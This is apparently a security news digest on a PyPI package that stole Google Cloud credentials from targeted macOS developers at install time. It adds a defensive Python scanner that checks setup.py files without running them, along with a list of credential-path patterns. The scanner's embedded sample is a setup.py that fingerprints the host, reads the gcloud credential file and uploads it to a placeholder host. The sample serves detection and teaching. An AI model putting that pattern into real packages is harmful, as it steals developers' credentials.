Targeted PyPi Package Steals Google Cloud Credentials from macOS Devs

July 26, 2024 at 04:55PM

Researchers discovered a Python package called “lr-utils-lib” on PyPI that was built to run only on a predetermined set of macOS machines and to steal Google Cloud Platform credentials from them. The package hides its malicious code in the setup script that executes at install time, poses as a legitimate utility library, and is backed by a social engineering persona. The campaign stands out for how narrowly it is targeted, which makes it a significant risk for the organizations whose developers were on the list.

Key Takeaways from Meeting Notes:

– A malicious Python package, “lr-utils-lib,” was identified on the Python Package Index (PyPI) in June. It is built to act only on a limited set of macOS victims and to steal Google Cloud Platform credentials from them.

– The malware is highly targeted: it delivers its payload only to a predetermined list of 64 specific machines. The attacker’s identity and further details about the targeted machines are currently unknown.

– Social engineering is involved: the package owner poses as “Lucid Zenith,” who claims on LinkedIn to be the CEO of Apex Companies LLC. When asked about this persona, AI-powered search engines and chatbots gave inconsistent answers, so they cannot be relied on to confirm or refute such a claim.

– The campaign stands out because such narrowly targeted abuse of open source software (OSS) distribution is rare. Organizations must exercise vigilance and critical thinking across their software supply chain, including thorough verification of where a package comes from and what it actually contains.

– To defend against such attacks: stay vigilant during software upgrades, be cautious of social engineering, and review the contents of setup scripts before installing packages, since a setup script runs on the developer’s machine at install time. Claims about a package’s author should be checked against several independent sources rather than a single profile or a chatbot answer, and organizations should foster a culture of critical thinking in their verification processes.
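One way to carry out the setup-script review recommended above, as an added example that is not code from the original article or from the package it describes: the script below parses a setup.py with Python’s standard-library ast module (without executing it) and flags constructs a build script has no normal use for: process execution, network access, dynamic code execution, imports used for host fingerprinting, references to well-known credential files, and any top-level statement other than imports, definitions and the setup() call, because those run unconditionally at install time. The sample setup.py it scans is constructed for this example and only illustrates the general pattern (fingerprint the host, read a Google Cloud credential file, send it out); the target hash, package name and exfiltration host in it are hypothetical.

```python
"""Static triage of a package's setup.py before installing it.

Added example (heuristic scanner), not the code of any real package.
Only ast.parse is used, so the scanned script never runs.
"""
import ast

# Modules a setup.py rarely needs; their presence warrants a manual read.
SUSPICIOUS_MODULES = {
    "subprocess", "socket", "urllib", "urllib.request", "requests",
    "http.client", "ctypes", "base64", "platform", "uuid",
}
# Calls that execute commands or code, or reach the network.
SUSPICIOUS_CALLS = {
    "exec", "eval", "compile", "os.system", "os.popen", "subprocess.run",
    "subprocess.Popen", "subprocess.check_output", "urlopen",
    "urllib.request.urlopen", "requests.get", "requests.post", "socket.socket",
}
# Fragments of paths that hold cloud or SSH credentials on a developer machine.
CREDENTIAL_HINTS = (
    ".config/gcloud", "application_default_credentials", "credentials.db",
    ".aws/credentials", ".ssh/", "id_rsa", ".kube/config", ".netrc",
)

# Constructed sample of a booby-trapped setup.py; every value in it is made up.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
import hashlib, os, platform
from urllib.request import urlopen, Request

# Hashes of the machine identifiers the operator wants to hit (constructed).
TARGETS = {"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"}

def _collect():
    fp = hashlib.sha256(platform.node().encode()).hexdigest()
    if fp not in TARGETS:
        return
    p = os.path.expanduser("~/.config/gcloud/application_default_credentials.json")
    if os.path.exists(p):
        urlopen(Request("https://exfil.invalid/upload", data=open(p, "rb").read()))

_collect()

setup(name="some-utils-lib", version="1.0.0", packages=[])
'''


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_setup_script(source: str) -> list[str]:
    """Return sorted, de-duplicated findings for one setup.py source text."""
    hits: set[tuple[int, str]] = set()
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_MODULES:
                    hits.add((node.lineno, f"imports {alias.name}"))
        elif isinstance(node, ast.ImportFrom) and node.module in SUSPICIOUS_MODULES:
            hits.add((node.lineno, f"imports from {node.module}"))
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                hits.add((node.lineno, f"calls {name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for hint in CREDENTIAL_HINTS:
                if hint in node.value:
                    hits.add((node.lineno, f"references credential path {hint!r}"))
                    break
    # Anything at module level beyond imports, assignments, definitions and the
    # setup() call itself executes the moment pip builds the source distribution.
    for stmt in tree.body:
        if isinstance(stmt, (ast.Import, ast.ImportFrom, ast.Assign,
                             ast.FunctionDef, ast.ClassDef)):
            continue
        if (isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
                and _dotted_name(stmt.value.func) == "setup"):
            continue
        hits.add((stmt.lineno,
                  f"top-level statement ({type(stmt).__name__}) runs at install time"))
    return [f"line {ln}: {msg}" for ln, msg in sorted(hits)]


def main() -> None:
    for finding in scan_setup_script(SAMPLE_SETUP_PY):
        print(finding)


if __name__ == "__main__":
    main()
```

To obtain the file to inspect without running it, fetch the source distribution with `pip download --no-deps --no-binary :all: <package>` and unpack it; `pip install --only-binary :all:` refuses source distributions altogether, so setup.py never executes, at the cost of failing for packages that ship no wheel. The heuristics are deliberately narrow: a clean setup.py normally needs nothing beyond setuptools, so any finding is a reason to read the script by hand rather than a verdict on its own, and obfuscated payloads (base64 plus exec, for example) still surface through the import and call checks.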
